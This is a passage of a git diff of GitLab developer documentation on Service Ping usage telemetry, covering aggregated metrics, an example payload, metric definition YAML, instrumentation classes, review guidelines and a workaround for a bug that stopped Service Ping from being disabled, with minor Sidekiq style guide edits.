Ping payload under the `aggregated_metrics` sub-key in the `counts_weekly` and `counts_monthly` top level keys. + +```ruby +{ + :counts_monthly => { + :deployments => 1003, + :successful_deployments => 78, + :failed_deployments => 275, + :packages => 155, + :personal_snippets => 2106, + :project_snippets => 407, + :promoted_issues => 719, + :aggregated_metrics => { + :example_metrics_union => 7, + :example_metrics_intersection => 2 + }, + :snippets => 2513 + } +} +``` + +Aggregated metrics for `all` time frame are present in the `count` top level key, with the `aggregate_` prefix added to their name. + +For example: + +`example_metrics_intersection` + +Becomes: + +`counts.aggregate_example_metrics_intersection` + +```ruby +{ + :counts => { + :deployments => 11003, + :successful_deployments => 178, + :failed_deployments => 1275, + :aggregate_example_metrics_intersection => 12 + } +} +``` + +### Redis sourced aggregated metrics + +> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/45979) in GitLab 13.6. + +To declare the aggregate of events collected with [Redis HLL Counters](#redis-hll-counters), +you must fulfill the following requirements: + +1. All events listed at `events` attribute must come from + [`known_events/*.yml`](#known-events-are-added-automatically-in-service-data-payload) files. +1. All events listed at `events` attribute must have the same `redis_slot` attribute. +1. All events listed at `events` attribute must have the same `aggregation` attribute. +1. `time_frame` does not include `all` value, which is unavailable for Redis sourced aggregated metrics. + +### Database sourced aggregated metrics + +> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/52784) in GitLab 13.9. +> - It's [deployed behind a feature flag](../../user/feature_flags.md), disabled by default. +> - It's enabled on GitLab.com. + +To declare an aggregate of metrics based on events collected from database, follow +these steps: + +1. [Persist the metrics for aggregation](#persist-metrics-for-aggregation). +1. [Add new aggregated metric definition](#add-new-aggregated-metric-definition). + +#### Persist metrics for aggregation + +Only metrics calculated with [Estimated Batch Counters](#estimated-batch-counters) +can be persisted for database sourced aggregated metrics. To persist a metric, +inject a Ruby block into the +[estimate_batch_distinct_count](#estimate_batch_distinct_count-method) method. +This block should invoke the +`Gitlab::Usage::Metrics::Aggregates::Sources::PostgresHll.save_aggregated_metrics` +[method](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/usage/metrics/aggregates/sources/postgres_hll.rb#L21), +which stores `estimate_batch_distinct_count` results for future use in aggregated metrics. + +The `Gitlab::Usage::Metrics::Aggregates::Sources::PostgresHll.save_aggregated_metrics` +method accepts the following arguments: + +- `metric_name`: The name of metric to use for aggregations. Should be the same + as the key under which the metric is added into Service Ping. +- `recorded_at_timestamp`: The timestamp representing the moment when a given + Service Ping payload was collected. You should use the convenience method `recorded_at` + to fill `recorded_at_timestamp` argument, like this: `recorded_at_timestamp: recorded_at` +- `time_period`: The time period used to build the `relation` argument passed into + `estimate_batch_distinct_count`. To collect the metric with all available historical + data, set a `nil` value as time period: `time_period: nil`. +- `data`: HyperLogLog buckets structure representing unique entries in `relation`. + The `estimate_batch_distinct_count` method always passes the correct argument + into the block, so `data` argument must always have a value equal to block argument, + like this: `data: result` + +Example metrics persistence: + +```ruby +class UsageData + def count_secure_pipelines(time_period) + ... + relation = ::Security::Scan.latest_successful_by_build.by_scan_types(scan_type).where(security_scans: time_period) + + pipelines_with_secure_jobs['dependency_scanning_pipeline'] = estimate_batch_distinct_count(relation, :commit_id, batch_size: 1000, start: start_id, finish: finish_id) do |result| + ::Gitlab::Usage::Metrics::Aggregates::Sources::PostgresHll + .save_aggregated_metrics(metric_name: 'dependency_scanning_pipeline', recorded_at_timestamp: recorded_at, time_period: time_period, data: result) + end + end +end +``` + +#### Add new aggregated metric definition + +After all metrics are persisted, you can add an aggregated metric definition at +[`aggregated_metrics/`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/aggregates/). + +To declare the aggregate of metrics collected with [Estimated Batch Counters](#estimated-batch-counters), +you must fulfill the following requirements: + +- Metrics names listed in the `events:` attribute, have to use the same names you passed in the `metric_name` argument while persisting metrics in previous step. +- Every metric listed in the `events:` attribute, has to be persisted for **every** selected `time_frame:` value. + +Example definition: + +```yaml +- name: example_metrics_intersection_database_sourced + operator: AND + source: database + events: + - 'dependency_scanning_pipeline' + - 'container_scanning_pipeline' + time_frame: + - 28d + - all +``` + +## Example Service Ping payload + +The following is example content of the Service Ping payload. + +```json +{ + "uuid": "0000000-0000-0000-0000-000000000000", + "hostname": "example.com", + "version": "12.10.0-pre", + "installation_type": "omnibus-gitlab", + "active_user_count": 999, + "recorded_at": "2020-04-17T07:43:54.162+00:00", + "edition": "EEU", + "license_md5": "00000000000000000000000000000000", + "license_id": null, + "historical_max_users": 999, + "licensee": { + "Name": "ABC, Inc.", + "Email": "email@example.com", + "Company": "ABC, Inc." + }, + "license_user_count": 999, + "license_starts_at": "2020-01-01", + "license_expires_at": "2021-01-01", + "license_plan": "ultimate", + "license_add_ons": { + }, + "license_trial": false, + "counts": { + "assignee_lists": 999, + "boards": 999, + "ci_builds": 999, + ... + }, + "container_registry_enabled": true, + "dependency_proxy_enabled": false, + "gitlab_shared_runners_enabled": true, + "gravatar_enabled": true, + "influxdb_metrics_enabled": true, + "ldap_enabled": false, + "mattermost_enabled": false, + "omniauth_enabled": true, + "prometheus_enabled": false, + "prometheus_metrics_enabled": false, + "reply_by_email_enabled": "incoming+%{key}@incoming.gitlab.com", + "signup_enabled": true, + "web_ide_clientside_preview_enabled": true, + "projects_with_expiration_policy_disabled": 999, + "projects_with_expiration_policy_enabled": 999, + ... + "elasticsearch_enabled": true, + "license_trial_ends_on": null, + "geo_enabled": false, + "git": { + "version": { + "major": 2, + "minor": 26, + "patch": 1 + } + }, + "gitaly": { + "version": "12.10.0-rc1-93-g40980d40", + "servers": 56, + "clusters": 14, + "filesystems": [ + "EXT_2_3_4" + ] + }, + "gitlab_pages": { + "enabled": true, + "version": "1.17.0" + }, + "container_registry_server": { + "vendor": "gitlab", + "version": "2.9.1-gitlab" + }, + "database": { + "adapter": "postgresql", + "version": "9.6.15", + "pg_system_id": 6842684531675334351 + }, + "analytics_unique_visits": { + "g_analytics_contribution": 999, + ... + }, + "usage_activity_by_stage": { + "configure": { + "project_clusters_enabled": 999, + ... + }, + "create": { + "merge_requests": 999, + ... + }, + "manage": { + "events": 999, + ... + }, + "monitor": { + "clusters": 999, + ... + }, + "package": { + "projects_with_packages": 999 + }, + "plan": { + "issues": 999, + ... + }, + "release": { + "deployments": 999, + ... + }, + "secure": { + "user_container_scanning_jobs": 999, + ... + }, + "verify": { + "ci_builds": 999, + ... + } + }, + "usage_activity_by_stage_monthly": { + "configure": { + "project_clusters_enabled": 999, + ... + }, + "create": { + "merge_requests": 999, + ... + }, + "manage": { + "events": 999, + ... + }, + "monitor": { + "clusters": 999, + ... + }, + "package": { + "projects_with_packages": 999 + }, + "plan": { + "issues": 999, + ... + }, + "release": { + "deployments": 999, + ... + }, + "secure": { + "user_container_scanning_jobs": 999, + ... + }, + "verify": { + "ci_builds": 999, + ... + } + }, + "topology": { + "duration_s": 0.013836685999194742, + "application_requests_per_hour": 4224, + "query_apdex_weekly_average": 0.996, + "failures": [], + "nodes": [ + { + "node_memory_total_bytes": 33269903360, + "node_memory_utilization": 0.35, + "node_cpus": 16, + "node_cpu_utilization": 0.2, + "node_uname_info": { + "machine": "x86_64", + "sysname": "Linux", + "release": "4.19.76-linuxkit" + }, + "node_services": [ + { + "name": "web", + "process_count": 16, + "process_memory_pss": 233349888, + "process_memory_rss": 788220927, + "process_memory_uss": 195295487, + "server": "puma" + }, + { + "name": "sidekiq", + "process_count": 1, + "process_memory_pss": 734080000, + "process_memory_rss": 750051328, + "process_memory_uss": 731533312 + }, + ... + ], + ... + }, + ... + ] + } +} +``` + +## Notable changes + +In GitLab 13.5, `pg_system_id` was added to send the [PostgreSQL system identifier](https://www.2ndquadrant.com/en/blog/support-for-postgresqls-system-identifier-in-barman/). + +## Exporting Service Ping SQL queries and definitions + +Two Rake tasks exist to export Service Ping definitions. + +- The Rake tasks export the raw SQL queries for `count`, `distinct_count`, `sum`. +- The Rake tasks export the Redis counter class or the line of the Redis block for `redis_usage_data`. +- The Rake tasks calculate the `alt_usage_data` metrics. + +In the home directory of your local GitLab installation run the following Rake tasks for the YAML and JSON versions respectively: + +```shell +# for YAML export +bin/rake gitlab:usage_data:dump_sql_in_yaml + +# for JSON export +bin/rake gitlab:usage_data:dump_sql_in_json + +# You may pipe the output into a file +bin/rake gitlab:usage_data:dump_sql_in_yaml > ~/Desktop/usage-metrics-2020-09-02.yaml +``` + +## Generating and troubleshooting Service Ping + +This activity is to be done via a detached screen session on a remote server. + +Before you begin these steps, make sure the key is added to the SSH agent locally +with the `ssh-add` command. + +### Triggering + +1. Connect to bastion with agent forwarding: `$ ssh -A lb-bastion.gprd.gitlab.com` +1. Create named screen: `$ screen -S <username>_usage_ping_<date>` +1. Connect to console host: `$ ssh $USER-rails@console-01-sv-gprd.c.gitlab-production.internal` +1. Run `SubmitUsagePingService.new.execute` +1. Detach from screen: `ctrl + a, ctrl + d` +1. Exit from bastion: `$ exit` + +### Verification (After approx 30 hours) + +1. Reconnect to bastion: `$ ssh -A lb-bastion.gprd.gitlab.com` +1. Find your screen session: `$ screen -ls` +1. Attach to your screen session: `$ screen -x 14226.mwawrzyniak_usage_ping_2021_01_22` +1. Check the last payload in `raw_usage_data` table: `RawUsageData.last.payload` +1. Check the when the payload was sent: `RawUsageData.last.sent_at` + +## Troubleshooting + +### Cannot disable Service Ping using the configuration file + +The method to disable Service Ping using the GitLab configuration file does not work in +GitLab versions 9.3.0 to 13.12.3. To disable it, you need to use the Admin Area in +the GitLab UI instead. For more information, see +[this issue](https://gitlab.com/gitlab-org/gitlab/-/issues/333269). + +GitLab functionality and application settings cannot override or circumvent +restrictions at the network layer. If Service Ping is blocked by your firewall, +you are not impacted by this bug. + +#### Check if you are affected + +You can check if you were affected by this bug by using the Admin area or by +checking the configuration file of your GitLab instance: + +- Using the Admin area: + + 1. On the top bar, go to the admin area (**{admin}**). + 1. On the left sidebar, select **Settings > Metrics and profiling**. + 1. Expand **Usage Statistics**. + 1. Are you able to check/uncheck the checkbox to disable Service Ping? + + - If _yes_, your GitLab instance is not affected by this bug. + - If you can't check/uncheck the checkbox, you are affected by this bug. + Read below [how to fix this](#how-to-fix-the-cannot-disable-service-ping-bug). + +- Checking your GitLab instance configuration file: + + To check whether you're impacted by this bug, check your instance configuration + settings. The configuration file in which Service Ping can be disabled will depend + on your installation and deployment method, but it will typically be one of the following: + + - `/etc/gitlab/gitlab.rb` for Omnibus GitLab Linux Package and Docker. + - `charts.yaml` for GitLab Helm and cloud-native Kubernetes deployments. + - `gitlab.yml` for GitLab installations from source. + + To check the relevant configuration file for strings that indicate whether + Service Ping is disabled, you can use `grep`: + + ```shell + # Linux package + grep "usage_ping_enabled'\] = false" /etc/gitlab/gitlab.rb + + # Kubernetes charts + grep "enableUsagePing: false" values.yaml + + # From source + grep "usage_ping_enabled'\] = false" gitlab/config.yml + ``` + + If you see any output after running the relevant command, your GitLab instance + may be affected by the bug. Otherwise, your instance is not affected. + +#### How to fix the "Cannot disable Service Ping" bug + +To work around this bug, you have two options: + +- [Update](../../update/index.md) to GitLab 13.12.4 or newer to fix this bug. +- If you can't update to GitLab 13.12.4 or newer, enable Service Ping in the + configuration file, then disable Service Ping in the UI. For example, if you're + using the Linux package: + + 1. Edit `/etc/gitlab/gitlab.rb`: + + ```ruby + gitlab_rails['usage_ping_enabled'] = true + ``` + + 1. Reconfigure GitLab: + + ```shell + sudo gitlab-ctl reconfigure + ``` + + 1. In GitLab, on the top bar, go to the admin area (**{admin}**). + 1. On the left sidebar, select **Settings > Metrics and profiling**. + 1. Expand **Usage Statistics**. + 1. Clear the **Enable service ping** checkbox. + 1. Select **Save Changes**. diff --git a/doc/development/service_ping/metrics_dictionary.md b/doc/development/service_ping/metrics_dictionary.md new file mode 100644 index 00000000000..b64b2234fa9 --- /dev/null +++ b/doc/development/service_ping/metrics_dictionary.md @@ -0,0 +1,237 @@ +--- +stage: Growth +group: Product Intelligence +info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments +--- + +# Metrics Dictionary Guide + +This guide describes Metrics Dictionary and how it's implemented + +## Metrics Definition and validation + +We are using [JSON Schema](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/schema.json) to validate the metrics definition. + +This process is meant to ensure consistent and valid metrics defined for Service Ping. All metrics *must*: + +- Comply with the defined [JSON schema](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/schema.json). +- Have a unique `key_path` . +- Have an owner. + +All metrics are stored in YAML files: + +- [`config/metrics`](https://gitlab.com/gitlab-org/gitlab/-/tree/master/config/metrics) + +Each metric is defined in a separate YAML file consisting of a number of fields: + +| Field | Required | Additional information | +|---------------------|----------|----------------------------------------------------------------| +| `key_path` | yes | JSON key path for the metric, location in Service Ping payload. | +| `name` | no | Metric name suggestion. Can replace the last part of `key_path`. | +| `description` | yes | | +| `product_section` | yes | The [section](https://gitlab.com/gitlab-com/www-gitlab-com/-/blob/master/data/sections.yml). | +| `product_stage` | no | The [stage](https://gitlab.com/gitlab-com/www-gitlab-com/blob/master/data/stages.yml) for the metric. | +| `product_group` | yes | The [group](https://gitlab.com/gitlab-com/www-gitlab-com/blob/master/data/stages.yml) that owns the metric. | +| `product_category` | no | The [product category](https://gitlab.com/gitlab-com/www-gitlab-com/blob/master/data/categories.yml) for the metric. | +| `value_type` | yes | `string`; one of [`string`, `number`, `boolean`, `object`](https://json-schema.org/understanding-json-schema/reference/type.html). | +| `status` | yes | `string`; [status](#metric-statuses) of the metric, may be set to `data_available`, `implemented`, `not_used`, `deprecated`, `removed`, `broken`. | +| `time_frame` | yes | `string`; may be set to a value like `7d`, `28d`, `all`, `none`. | +| `data_source` | yes | `string`; may be set to a value like `database`, `redis`, `redis_hll`, `prometheus`, `system`. | +| `data_category` | yes | `string`; [categories](#data-category) of the metric, may be set to `Operational`, `Optional`, `Subscription`, `Standard`. | +| `instrumentation_class` | no | `string`; [the class that implements the metric](metrics_instrumentation.md). | +| `distribution` | yes | `array`; may be set to one of `ce, ee` or `ee`. The [distribution](https://about.gitlab.com/handbook/marketing/strategic-marketing/tiers/#definitions) where the tracked feature is available. | +| `tier` | yes | `array`; may be set to one of `free, premium, ultimate`, `premium, ultimate` or `ultimate`. The [tier]( https://about.gitlab.com/handbook/marketing/strategic-marketing/tiers/) where the tracked feature is available. | +| `milestone` | no | The milestone when the metric is introduced. | +| `milestone_removed` | no | The milestone when the metric is removed. | +| `introduced_by_url` | no | The URL to the Merge Request that introduced the metric. | +| `repair_issue_url` | no | The URL of the issue that was created to repair a metric with a `broken` status. | +| `options` | no | `object`: options information needed to calculate the metric value. | +| `skip_validation` | no | This should **not** be set. [Used for imported metrics until we review, update and make them valid](https://gitlab.com/groups/gitlab-org/-/epics/5425). | + +### Metric statuses + +Metric definitions can have one of the following statuses: + +- `data_available`: Metric data is available and used in a Sisense dashboard. +- `implemented`: Metric is implemented but data is not yet available. This is a temporary + status for newly added metrics awaiting inclusion in a new release. +- `broken`: Metric reports broken data (for example, -1 fallback), or does not report data at all. A metric marked as `broken` must also have the `repair_issue_url` attribute. +- `not_used`: Metric is not used in any dashboard. +- `deprecated`: Metric is deprecated and possibly planned to be removed. +- `removed`: Metric was removed, but it may appear in Service Ping payloads sent from instances running on older versions of GitLab. + +### Metric value_type + +Metric definitions can have one of the following values for `value_type`: + +- `boolean` +- `number` +- `string` +- `object`: A metric with `value_type: object` must have `value_json_schema` with a link to the JSON schema for the object. +In general, we avoid complex objects and prefer one of the `boolean`, `number`, or `string` value types. +An example of a metric that uses `value_type: object` is `topology` (`/config/metrics/settings/20210323120839_topology.yml`), +which has a related schema in `/config/metrics/objects_schemas/topology_schema.json`. + +### Metric time_frame + +- `7d`: The metric data applies to the most recent 7-day interval. For example, the following metric counts the number of users that create epics over a 7-day interval: `ee/config/metrics/counts_7d/20210305145820_g_product_planning_epic_created_weekly.yml`. +- `28d`: The metric data applies to the most recent 28-day interval. For example, the following metric counts the number of unique users that create issues over a 28-day interval: `config/metrics/counts_28d/20210216181139_issues.yml`. +- `all`: The metric data applies for the whole time the metric has been active (all-time interval). For example, the following metric counts all users that create issues: `/config/metrics/counts_all/20210216181115_issues.yml`. +- `none`: The metric collects a type of data that's not tracked over time, such as settings and configuration information. Therefore, a time interval is not applicable. For example, `uuid` has no time interval applicable: `config/metrics/license/20210201124933_uuid.yml`. + +### Metric name + +To improve metric discoverability by a wider audience, each metric with +instrumentation added at an appointed `key_path` receives a `name` attribute +filled with the name suggestion, corresponding to the metric `data_source` and instrumentation. +Metric name suggestions can contain two types of elements: + +1. **User input prompts**: Enclosed by `<>`, these pieces should be replaced or + removed when you create a metrics YAML file. +1. **Fixed suggestion**: Plaintext parts generated according to well-defined algorithms. + They are based on underlying instrumentation, and should not be changed. + +For a metric name to be valid, it must not include any prompt, and no fixed suggestions +should be changed. + +### Data category + +We use the following categories to classify a metric: + +- `Operational`: Required data for operational purposes. +- `Optional`: Data that is optional to collect. This can be [enabled or disabled](../service_ping/index.md#disable-service-ping) in the Admin Area. +- `Subscription`: Data related to licensing. +- `Standard`: Standard set of identifiers that are included when collecting data. + +### Metric name suggestion examples + +#### Metric with `data_source: database` + +For a metric instrumented with SQL: + +```sql +SELECT COUNT(DISTINCT user_id) FROM clusters WHERE clusters.management_project_id IS NOT NULL +``` + +- **Suggested name**: `count_distinct_user_id_from_<adjective describing: '(clusters.management_project_id IS NOT NULL)'>_clusters` +- **Prompt**: `<adjective describing: '(clusters.management_project_id IS NOT NULL)'>` + should be replaced with an adjective that best represents filter conditions, such as `project_management` +- **Final metric name**: For example, `count_distinct_user_id_from_project_management_clusters` + +For metric instrumented with SQL: + +```sql +SELECT COUNT(DISTINCT clusters.user_id) +FROM clusters_applications_helm +INNER JOIN clusters ON clusters.id = clusters_applications_helm.cluster_id +WHERE clusters_applications_helm.status IN (3, 5) +``` + +- **Suggested name**: `count_distinct_user_id_from_<adjective describing: '(clusters_applications_helm.status IN (3, 5))'>_clusters_<with>_<adjective describing: '(clusters_applications_helm.status IN (3, 5))'>_clusters_applications_helm` +- **Prompt**: `<adjective describing: '(clusters_applications_helm.status IN (3, 5))'>` + should be replaced with an adjective that best represents filter conditions +- **Final metric name**: `count_distinct_user_id_from_clusters_with_available_clusters_applications_helm` + +In the previous example, the prompt is irrelevant, and user can remove it. The second +occurrence corresponds with the `available` scope defined in `Clusters::Concerns::ApplicationStatus`. +It can be used as the right adjective to replace prompt. + +The `<with>` represents a suggested conjunction for the suggested name of the joined relation. +The person documenting the metric can use it by either: + +- Removing the surrounding `<>`. +- Using a different conjunction, such as `having` or `including`. + +#### Metric with `data_source: redis` or `redis_hll` + +For metrics instrumented with a Redis-based counter, the suggested name includes +only the single prompt to be replaced by the person working with metrics YAML. + +- **Prompt**: `<please fill metric name, suggested format is: {subject}_{verb}{ing|ed}_{object} eg: users_creating_epics or merge_requests_viewed_in_single_file_mode>` +- **Final metric name**: We suggest the metric name should follow the format of + `{subject}_{verb}{ing|ed}_{object}`, such as `user_creating_epics`, `users_triggering_security_scans`, + or `merge_requests_viewed_in_single_file_mode` + +#### Metric with `data_source: prometheus` or `system` + +For metrics instrumented with Prometheus or coming from the operating system, +the suggested name includes only the single prompt by person working with metrics YAML. + +- **Prompt**: `<please fill metric name>` +- **Final metric name**: Due to the variety of cases that can apply to this kind of metric, + no naming convention exists. Each person instrumenting a metric should use their + best judgment to come up with a descriptive name. + +### Example YAML metric definition + +The linked [`uuid`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/license/uuid.yml) +YAML file includes an example metric definition, where the `uuid` metric is the GitLab +instance unique identifier. + +```yaml +key_path: uuid +description: GitLab instance unique identifier +product_category: collection +product_section: growth +product_stage: growth +product_group: group::product intelligence +value_type: string +status: data_available +milestone: 9.1 +introduced_by_url: https://gitlab.com/gitlab-org/gitlab/-/merge_requests/1521 +time_frame: none +data_source: database +distribution: +- ce +- ee +tier: +- free +- premium +- ultimate +``` + +## Create a new metric definition + +The GitLab codebase provides a dedicated [generator](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/generators/gitlab/usage_metric_definition_generator.rb) to create new metric definitions. + +For uniqueness, the generated file includes a timestamp prefix, in ISO 8601 format. + +The generator takes the key path argument and 2 options and creates the metric YAML definition in corresponding location: + +- `--ee`, `--no-ee` Indicates if metric is for EE. +- `--dir=DIR` indicates the metric directory. It must be one of: `counts_7d`, `7d`, `counts_28d`, `28d`, `counts_all`, `all`, `settings`, `license`. + +```shell +bundle exec rails generate gitlab:usage_metric_definition counts.issues --dir=7d +create config/metrics/counts_7d/issues.yml +``` + +NOTE: +To create a metric definition used in EE, add the `--ee` flag. + +```shell +bundle exec rails generate gitlab:usage_metric_definition counts.issues --ee --dir=7d +create ee/config/metrics/counts_7d/issues.yml +``` + +## Metrics added dynamic to Service Ping payload + +The [Redis HLL metrics](index.md#known-events-are-added-automatically-in-service-data-payload) are added automatically to Service Ping payload. + +A YAML metric definition is required for each metric. A dedicated generator is provided to create metric definitions for Redis HLL events. + +The generator takes `category` and `event` arguments, as the root key will be `redis_hll_counters`, and creates two metric definitions for weekly and monthly timeframes: + +```shell +bundle exec rails generate gitlab:usage_metric_definition:redis_hll issues i_closed +create config/metrics/counts_7d/i_closed_weekly.yml +create config/metrics/counts_28d/i_closed_monthly.yml +``` + +To create a metric definition used in EE, add the `--ee` flag. + +```shell +bundle exec rails generate gitlab:usage_metric_definition:redis_hll issues users_closing_issues --ee +create config/metrics/counts_7d/i_closed_weekly.yml +create config/metrics/counts_28d/i_closed_monthly.yml +``` diff --git a/doc/development/service_ping/metrics_instrumentation.md b/doc/development/service_ping/metrics_instrumentation.md new file mode 100644 index 00000000000..61a1ff828be --- /dev/null +++ b/doc/development/service_ping/metrics_instrumentation.md @@ -0,0 +1,102 @@ +--- +stage: Growth +group: Product Intelligence +info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments +--- + +# Metrics instrumentation guide + +This guide describes how to develop Service Ping metrics using metrics instrumentation. + +## Nomenclature + +- **Instrumentation class**: + - Inherits one of the metric classes: `DatabaseMetric`, `RedisHLLMetric` or `GenericMetric`. + - Implements the logic that calculates the value for a Service Ping metric. + +- **Metric definition** + The Service Data metric YAML definition. + +- **Hardening**: + Hardening a method is the process that ensures the method fails safe, returning a fallback value like -1. + +## How it works + +A metric definition has the [`instrumentation_class`](metrics_dictionary.md) field, which can be set to a class. + +The defined instrumentation class should have one of the existing metric classes: `DatabaseMetric`, `RedisHLLMetric`, or `GenericMetric`. + +Using the instrumentation classes ensures that metrics can fail safe individually, without breaking the entire + process of Service Ping generation. + +We have built a domain-specific language (DSL) to define the metrics instrumentation. + +## Database metrics + +[Example of a merge request that adds a database metric](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/60022). + +```ruby +module Gitlab + module Usage + module Metrics + module Instrumentations + class CountBoardsMetric < DatabaseMetric + operation :count + + relation { Board } + end + end + end + end +end +``` + +## Redis HyperLogLog metrics + +[Example of a merge request that adds a `RedisHLL` metric](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/61685). + +Count unique values for `i_quickactions_approve` event. + +```yaml +time_frame: 28d +data_source: redis_hll +instrumentation_class: 'Gitlab::Usage::Metrics::Instrumentations::RedisHLLMetric' +options: + events: + - i_quickactions_approve +``` + +## Generic metrics + +[Example of a merge request that adds a generic metric](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/60256). + +```ruby +module Gitlab + module Usage + module Metrics + module Instrumentations + class UuidMetric < GenericMetric + value do + Gitlab::CurrentSettings.uuid + end + end + end + end + end +end +``` + +## Creating a new metric instrumentation class + +To create a stub instrumentation for a Service Ping metric, you can use a dedicated [generator](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/generators/gitlab/usage_metric_generator.rb): + +The generator takes the class name as an argument and the following options: + +- `--type=TYPE` Required. Indicates the metric type. It must be one of: `database`, `generic`, `redis_hll`. +- `--ee` Indicates if the metric is for EE. + +```shell +rails generate gitlab:usage_metric CountIssues --type database + create lib/gitlab/usage/metrics/instrumentations/count_issues_metric.rb + create spec/lib/gitlab/usage/metrics/instrumentations/count_issues_metric_spec.rb +``` diff --git a/doc/development/service_ping/review_guidelines.md b/doc/development/service_ping/review_guidelines.md new file mode 100644 index 00000000000..a4fb929a8a0 --- /dev/null +++ b/doc/development/service_ping/review_guidelines.md @@ -0,0 +1,75 @@ +--- +stage: Growth +group: Product Intelligence +info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments +--- + +# Service Ping review guidelines + +This page includes introductory material for a +[Product Intelligence](https://about.gitlab.com/handbook/engineering/development/growth/product-intelligence/) +review, and is specific to Service Ping related reviews. For broader advice and +general best practices for code reviews, refer to our [code review guide](../code_review.md). + +## Resources for reviewers + +- [Service Ping Guide](index.md) +- [Metrics Dictionary](metrics_dictionary.md) + +## Review process + +We recommend a Product Intelligence review when a merge request (MR) touches +any of the following Service Ping files: + +- `usage_data*` files. +- The Metrics Dictionary, including files in: + - [`config/metrics`](https://gitlab.com/gitlab-org/gitlab/-/tree/master/config/metrics). + - [`ee/config/metrics`](https://gitlab.com/gitlab-org/gitlab/-/tree/master/ee/config/metrics). + - [`dictionary.md`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/doc/development/usage_ping/dictionary.md). + - [`schema.json`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/schema.json). +- Product Intelligence tooling. For example, + [`Gitlab::UsageMetricDefinitionGenerator`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/generators/gitlab/usage_metric_definition_generator.rb) + +### Roles and process + +#### The merge request **author** should + +- Decide whether a Product Intelligence review is needed. +- If a Product Intelligence review is needed, add the labels + `~product intelligence` and `~product intelligence::review pending`. +- Assign an + [engineer](https://gitlab.com/groups/gitlab-org/growth/product-intelligence/engineers/-/group_members?with_inherited_permissions=exclude) from the Product Intelligence team for a review. +- Set the correct attributes in the metric's YAML definition: + - `product_section`, `product_stage`, `product_group`, `product_category` + - Provide a clear description of the metric. +- Update the + [Metrics Dictionary](https://gitlab.com/gitlab-org/gitlab/-/blob/master/doc/development/usage_ping/dictionary.md) if needed. +- Add a changelog [according to guidelines](../changelog.md). + +#### The Product Intelligence **reviewer** should + +- Perform a first-pass review on the merge request and suggest improvements to the author. +- Check the [metrics location](index.md#1-naming-and-placing-the-metrics) in + the Service Ping JSON payload. +- Add the `~database` label and ask for a [database review](../database_review.md) for + metrics that are based on Database. +- For tracking using Redis HLL (HyperLogLog): + - Check the Redis slot. + - Check if a [feature flag is needed](index.md#recommendations). +- For a metric's YAML definition: + - Check the metric's `description`. + - Check the metric's `key_path`. + - Check the `product_section`, `product_stage`, `product_group`, and `product_category` fields. + Read the [stages file](https://gitlab.com/gitlab-com/www-gitlab-com/blob/master/data/stages.yml). + - Check the file location. Consider the time frame, and if the file should be under `ee`. + - Check the tiers. +- Approve the MR, and relabel the MR with `~"product intelligence::approved"`. + +## Review workload distribution + +[Danger bot](../dangerbot.md) adds the list of changed Product Intelligence files +and pings the +[`@gitlab-org/growth/product-intelligence/engineers`](https://gitlab.com/groups/gitlab-org/growth/product-intelligence/engineers/-/group_members?with_inherited_permissions=exclude) group for merge requests +that are not drafts. + +Any of the Product Intelligence engineers can be assigned for the Product Intelligence review. diff --git a/doc/development/shell_scripting_guide/index.md b/doc/development/shell_scripting_guide/index.md index 6071ae3a09d..d3b446d45da 100644 --- a/doc/development/shell_scripting_guide/index.md +++ b/doc/development/shell_scripting_guide/index.md @@ -127,4 +127,4 @@ for code review. --- -[Return to Development documentation](../README.md). +[Return to Development documentation](../index.md). diff --git a/doc/development/sidekiq_style_guide.md b/doc/development/sidekiq_style_guide.md index 7bc3ecf002f..a77c9908ef4 100644 --- a/doc/development/sidekiq_style_guide.md +++ b/doc/development/sidekiq_style_guide.md @@ -392,8 +392,12 @@ end If a large number of background jobs get scheduled at once, queueing of jobs may occur while jobs wait for a worker node to be become available. This is normal and gives the system resilience by allowing it to gracefully handle spikes in -traffic. Some jobs, however, are more sensitive to latency than others. Examples -of these jobs include: +traffic. Some jobs, however, are more sensitive to latency than others. + +In general, latency-sensitive jobs perform operations that a user could +reasonably expect to happen synchronously, rather than asynchronously in a +background worker. A common example is a write following an action. Examples of +these jobs include: 1. A job which updates a merge request following a push to a branch. 1. A job which invalidates a cache of known branches for a project after a push @@ -474,20 +478,28 @@ of reading a stale record is non-zero due to replicas potentially lagging behind When the number of jobs that rely on the database increases, ensuring immediate data consistency can put unsustainable load on the primary database server. We therefore added the ability to use -[database load-balancing in Sidekiq workers](../administration/database_load_balancing.md#enable-the-load-balancer-for-sidekiq). +[database load balancing for Sidekiq workers](../administration/database_load_balancing.md#load-balancing-for-sidekiq). By configuring a worker's `data_consistency` field, we can then allow the scheduler to target read replicas under several strategies outlined below. ## Trading immediacy for reduced primary load -Not requiring immediate data consistency allows developers to decide to either: +We require Sidekiq workers to make an explicit decision around whether they need to use the +primary database node for all reads and writes, or whether reads can be served from replicas. This is +enforced by a RuboCop rule, which ensures that the `data_consistency` field is set. + +When setting this field, consider the following trade-off: - Ensure immediately consistent reads, but increase load on the primary database. - Prefer read replicas to add relief to the primary, but increase the likelihood of stale reads that have to be retried. -By default, any worker has a data consistency requirement of `:always`, so, as before, all -database operations target the primary. To allow for reads to be served from replicas instead, we -added two additional consistency modes: `:sticky` and `:delayed`. +To maintain the same behavior compared to before this field was introduced, set it to `:always`, so +database operations will only target the primary. Reasons for having to do so include workers +that mostly or exclusively perform writes, or workers that read their own writes and who might run +into data consistency issues should a stale record be read back 